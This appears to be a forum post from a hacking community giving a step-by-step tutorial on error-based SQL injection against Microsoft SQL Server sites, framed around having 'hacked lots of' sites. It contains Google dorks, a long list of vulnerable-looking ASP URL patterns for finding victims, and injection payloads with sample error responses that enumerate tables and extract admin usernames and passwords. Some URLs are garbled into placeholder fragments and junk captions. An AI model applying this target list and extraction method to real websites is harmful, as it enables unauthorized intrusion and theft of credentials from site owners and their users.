EXPERTS AND PROFESSIONALS ONLY!


    SQL INJECTION - Tutorial

    Share

    zeusk
    Admin

    Posts : 144
    Join date : 2011-12-04

    SQL INJECTION - Tutorial

    Post  zeusk on Thu Jun 21, 2012 7:25 am

    WE hacked lots of mySQL sites ...nw its time to target Microsoft.

    hope u will enjoy it....

    Lets start...

    There are various types of sql injection for MICROSOFT here as follows

    1)ODBC Error Message Attack with "CONVERT"
    2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
    3)MSSQL Injection with UNION Attack
    4)MSSQL Injection in Web Services (SOAP Injection)
    5)MSSQL Blind SQL Injection Attack

    I will be explaining various methods of sqli's in my various tuts..
    So for now we will start with easiest methode of sqli with CONVERT

    STEP 1:
    First we need to find a vulnerable site.

    By adding a single quote (') double quote ("") or a semicolon (DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm to the field under test.

    eg
    IANA — Example domains'
    IANA — Example domains

    It's vulnerable in SQL injection,If the output shows some error like this:

    [HTTP Response]------------------------------------------------------------------------------
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
    character string ''.
    /news.asp, line 52
    [End HTTP Response]-------------------------------------------------------------------------

    Also error could be something like below

    Microsoft OLE DB Provider for SQL Server error '80040e14 '
    Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
    ..../ main_rub.asp, line 4

    If the errors like above are shown then site could be vulnerable in SQL

    Also you can find vulnerable site from google dork.

    eg

    inurlDuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAmage.asp?id=
    inurl:index.asp?sid=

    Code:
    ".asp?bookID="
    ".asp?cart="
    ".asp?cartID="
    ".asp?catalogid="
    ".asp?category_list="
    ".asp?CategoryID="
    ".asp?catID="
    ".asp?cid="
    ".asp?code_no="
    ".asp?code="
    ".asp?designer="
    ".asp?framecode="
    ".asp?id="
    ".asp?idcategory="
    ".asp?idproduct="
    ".asp?intCatalogID="
    ".asp?intProdId="
    ".asp?item_id="
    ".asp?item="
    ".asp?itemID="
    ".asp?maingroup="
    ".asp?misc="
    ".asp?newsid="
    ".asp?order_id="
    ".asp?p="
    ".asp?pid="
    ".asp?ProdID="
    ".asp?product_id="
    ".asp?product="
    ".asp?productid="
    ".asp?showtopic="
    ".asp?Sku="
    ".asp?storeid="
    ".asp?style_id="
    ".asp?StyleID="
    ".asp?userID="
    "about.asp?cartID="
    "accinfo.asp?cartId="
    "acclogin.asp?cartID="
    "add.asp?bookid="
    "add_cart.asp?num="
    "addcart.asp?"
    "addItem.asp"
    "add-to-cart.asp?ID="
    "addToCart.asp?idProduct="
    "addtomylist.asp?ProdId="
    "adminEditProductFields.asp?intProdID="
    "advSearch_h.asp?idCategory="
    "affiliate.asp?ID="
    "affiliate-agreement.cfm?storeid="
    "affiliates.asp?id="
    "ancillary.asp?ID="
    "archive.asp?id="
    "article.asp?id="
    "aspx?PageID"
    "basket.asp?id="
    "Book.asp?bookID="
    "book_list.asp?bookid="
    "book_view.asp?bookid="
    "BookDetails.asp?ID="
    "browse.asp?catid="
    "browse_item_details.asp"
    "Browse_Item_Details.asp?Store_Id="
    "buy.asp?"
    "buy.asp?bookid="
    "bycategory.asp?id="
    "cardinfo.asp?card="
    "cart.asp?action="
    "cart.asp?cart_id="
    "cart.asp?id="
    "cart_additem.asp?id="
    "cart_validate.asp?id="
    "cartadd.asp?id="
    "cat.asp?iCat="
    "catalog.asp"
    "catalog.asp?CatalogID="
    "catalog_item.asp?ID="
    "catalog_main.asp?catid="
    "category.asp"
    "category.asp?catid="
    "category_list.asp?id="
    "categorydisplay.asp?catid="
    "checkout.asp?cartid="
    "checkout.asp?UserID="
    "checkout_confirmed.asp?order_id="
    "checkout1.asp?cartid="
    "comersus_listCategoriesAndProducts.asp?idCate gory ="
    "comersus_optEmailToFriendForm.asp?idProduct="
    "comersus_optReviewReadExec.asp?idProduct="
    "comersus_viewItem.asp?idProduct="
    "comments_form.asp?ID="
    "contact.asp?cartId="
    "content.asp?id="
    "customerService.asp?TextID1="
    "default.asp?catID="
    "description.asp?bookid="
    "details.asp?BookID="
    "details.asp?Press_Release_ID="
    "details.asp?Product_ID="
    "details.asp?Service_ID="
    "display_item.asp?id="
    "displayproducts.asp"
    "downloadTrial.asp?intProdID="
    "emailproduct.asp?itemid="
    "emailToFriend.asp?idProduct="
    "events.asp?ID="
    "faq.asp?cartID="
    "faq_list.asp?id="
    "faqs.asp?id="
    "feedback.asp?title="
    "freedownload.asp?bookid="
    "fullDisplay.asp?item="
    "getbook.asp?bookid="
    "GetItems.asp?itemid="
    "giftDetail.asp?id="
    "help.asp?CartId="
    "home.asp?id="
    "index.asp?cart="
    "index.asp?cartID="
    "index.asp?ID="
    "info.asp?ID="
    "item.asp?eid="
    "item.asp?item_id="
    "item.asp?itemid="
    "item.asp?model="
    "item.asp?prodtype="
    "item.asp?shopcd="
    "item_details.asp?catid="
    "item_list.asp?maingroup"
    "item_show.asp?code_no="
    "itemDesc.asp?CartId="
    "itemdetail.asp?item="
    "itemdetails.asp?catalogid="
    "learnmore.asp?cartID="
    "links.asp?catid="
    "list.asp?bookid="
    "List.asp?CatID="
    "listcategoriesandproducts.asp?idCategory="
    "modline.asp?id="
    "myaccount.asp?catid="
    "news.asp?id="
    "order.asp?BookID="
    "order.asp?id="
    "order.asp?item_ID="
    "OrderForm.asp?Cart="
    "page.asp?PartID="
    "payment.asp?CartID="
    "pdetail.asp?item_id="
    "powersearch.asp?CartId="
    "price.asp"
    "privacy.asp?cartID="
    "prodbycat.asp?intCatalogID="
    "prodetails.asp?prodid="
    "prodlist.asp?catid="
    "product.asp?bookID="
    "product.asp?intProdID="
    "product_info.asp?item_id="
    "productDetails.asp?idProduct="
    "productDisplay.asp"
    "productinfo.asp?item="
    "productlist.asp?ViewType=Category&CategoryID= "
    "productpage.asp"
    "products.asp?ID="
    "products.asp?keyword="
    "products_category.asp?CategoryID="
    "products_detail.asp?CategoryID="
    "productsByCategory.asp?intCatalogID="
    "prodView.asp?idProduct="
    "promo.asp?id="
    "promotion.asp?catid="
    "pview.asp?Item="
    "resellers.asp?idCategory="
    "results.asp?cat="
    "savecart.asp?CartId="
    "search.asp?CartID="
    "searchcat.asp?search_id="
    "Select_Item.asp?id="
    "Services.asp?ID="
    "shippinginfo.asp?CartId="
    "shop.asp?a="
    "shop.asp?action="
    "shop.asp?bookid="
    "shop.asp?cartID="
    "shop_details.asp?prodid="
    "shopaddtocart.asp"
    "shopaddtocart.asp?catalogid="
    "shopbasket.asp?bookid="
    "shopbycategory.asp?catid="
    "shopcart.asp?title="
    "shopcreatorder.asp"
    "shopcurrency.asp?cid="
    "shopdc.asp?bookid="
    "shopdisplaycategories.asp"
    "shopdisplayproduct.asp?catalogid="
    "shopdisplayproducts.asp"
    "shopexd.asp"
    "shopexd.asp?catalogid="
    "shopping_basket.asp?cartID="
    "shopprojectlogin.asp"
    "shopquery.asp?catalogid="
    "shopremoveitem.asp?cartid="
    "shopreviewadd.asp?id="
    "shopreviewlist.asp?id="
    "ShopSearch.asp?CategoryID="
    "shoptellafriend.asp?id="
    "shopthanks.asp"
    "shopwelcome.asp?title="
    "show_item.asp?id="
    "show_item_details.asp?item_id="
    "showbook.asp?bookid="
    "showStore.asp?catID="
    "shprodde.asp?SKU="
    "specials.asp?id="
    "store.asp?id="
    "store_bycat.asp?id="
    "store_listing.asp?id="
    "Store_ViewProducts.asp?Cat="
    "store-details.asp?id="
    "storefront.asp?id="
    "storefronts.asp?title="
    "storeitem.asp?item="
    "StoreRedirect.asp?ID="
    "subcategories.asp?id="
    "tek9.asp?"
    "template.asp?Action=Item&pid="
    "topic.asp?ID="
    "tuangou.asp?bookid="
    "type.asp?iType="
    "updatebasket.asp?bookid="
    "updates.asp?ID="
    "view.asp?cid="
    "view_cart.asp?title="
    "view_detail.asp?ID="
    "viewcart.asp?CartId="
    "viewCart.asp?userID="
    "viewCat_h.asp?idCategory="
    "viewevent.asp?EventID="
    "viewitem.asp?recor="
    "viewPrd.asp?idcategory="
    "ViewProduct.asp?misc="
    "voteList.asp?item_ID="
    "whatsnew.asp?idCategory="
    "WsAncillary.asp?ID="
    "WsPages.asp?ID="
    STEP 2:

    Now we got our vulnerable website.
    CONVERT command is used to convert between two data types and when the specific
    data cannot convert to another type the error will be returned.

    Now we start with our assessment by finding MSSQL_Version, DB_name.

    IANA — Example domains

    [http response]-------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
    (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

    /includes/templates/header.asp, line 21

    -----------------------------------------------------------

    We know now,its a Microsoft SQL Server 2005 n OS (Windows 2003 Server) (Build 3790: Service Pack 2)

    Let's go to enumerate DB_name.

    IANA — Example domains

    [http response]--------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'IPC' to data type int.

    /includes/templates/header.asp, line 21
    ------------------------------------------------------------

    The data base name is IPC.

    IANA — Example domains

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'ipcdc' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------

    The use operating database is ipcdc....

    STEP 3:
    NOW LETS FIND TABLES IN DATABASE

    IANA — Example domains e_name+from+information_schema.tables))--

    "information_schema.tables" stores information about tables in databases and there is a field called "table_name"
    which stores names of each table."SELECT TOP 1" will show first table in database.
    The result of this request is something like this:

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'siteStatus' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------

    Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
    We only put WHERE clause append the query in above request.
    IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------

    Second table 'headerGraphic'
    IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'admin' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    third table 'admin'

    Like this you will get each table name from the error.
    IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--

    If the query returns something like this.

    [http response]----------------------------------------
    ADODB.Field error '800a0bcd'
    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
    /page.asp, line 22

    -----------------------------------------------------------------

    IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'.

    STEP 4:
    Now we are all set.....and we will find columns in admin table

    We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
    but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
    IANA — Example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'))--

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'username' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    IANA — Example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--

    the response will be
    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'passwd' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    So 2nd column is 'passwd'


    DO THIS LIKE WE DID URL MANIPULATION FOR TABLES....
    DONT FORGET TO ADD WHERE CLAUSE.
    UNTILL U GET ERROR LIKE THIS
    [http response]----------------------------------------
    ADODB.Field error '800a0bcd'
    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
    /page.asp, line 22

    -----------------------------------------------------------------

    STEP 5: RETRIEVING USENAME n PASSWORD etc

    Now lets see what we got from above

    table_name: 'admin','siteStatus' n 'HeaderGraphic'

    Here we are interestedin 'admin'.So we found columns fo 'admin'

    column_name:'username' n 'passwd'

    LETS do our work now

    IANA — Example domains name+from+admin))--
    You will get first username in terms of error
    eg sa_admin
    IANA — Example domains wd+from+admin))--

    You will get passwd.
    eg comic123


    So u own .....MSSQL server wid

    USERNAME: sa_admin
    PASSWORD:comic123
    [note:
    1) you can use AND/OR both
    2) Dnt forget , (comma) after 'int' in convert()
    3) In error after ' (upper comma) is your table_name of column_name or etc
    4)you can enemerate more usernames n passwords by using 'not' command

      Current date/time is Mon Dec 05, 2016 2:34 pm